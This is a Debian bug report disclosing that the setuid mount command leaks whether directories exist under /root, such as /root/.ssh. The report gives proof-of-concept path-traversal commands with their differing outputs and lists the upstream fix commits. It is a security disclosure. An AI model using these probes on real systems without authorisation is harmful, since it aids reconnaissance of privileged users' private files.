Package: mount Version: 2.20.1-5.3 Severity: critical Tags: security Justification: root security hole
mount discloses information about folders not accessible for a user: $ ls -ld /root/.ssh ls: cannot access /root/.ssh: Permission denied $ ls -ld /root/.foo ls: cannot access /root/.foo: Permission denied First variant: $ mount --guess-fstype /root/.ssh/../../dev/sda1 ext4 $ mount --guess-fstype /root/.foo/../../dev/sda1 unknown Second one: $ mount /root/.ssh/../../dev/cdrom mount: no medium found on /dev/sr0 $ mount /root/.foo/../../dev/cdrom mount: can't find /root/.foo/../../dev/cdrom in /etc/fstab or /etc/mtab These issues were, as far as I can see, fixed in the following upstream commits: - 0377ef91270d06592a0d4dd009c29e7b1ff9c9b8 - 33c5fd0c5a774458470c86f9d318d8c48a9c9ccb - 5ebbc3865d1e53ef42e5f121c41faab23dd59075 - cc8cc8f32c863f3ae6a8a88e97b47bcd6a21825f However, the last two commits might have to be rewritten - I think that debian uses mount-deprecated and those commits are for the new mount. -- System Information: Debian Release: 7.0 APT prefers testing APT policy: (500, 'testing'), (1, 'experimental') Architecture: amd64 (x86_64) Foreign Architectures: i386 Kernel: Linux 3.6.7 (SMP w/2 CPU cores) Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/dash Versions of packages mount depends on: ii libblkid1 2.20.1-5.3 ii libc6 2.13-37 ii libmount1 2.20.1-5.3 ii libselinux1 2.1.9-5 ii libsepol1 2.1.4-3 mount recommends no packages. Versions of packages mount suggests: ii nfs-common 1:1.2.6-3 -- no debconf information -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
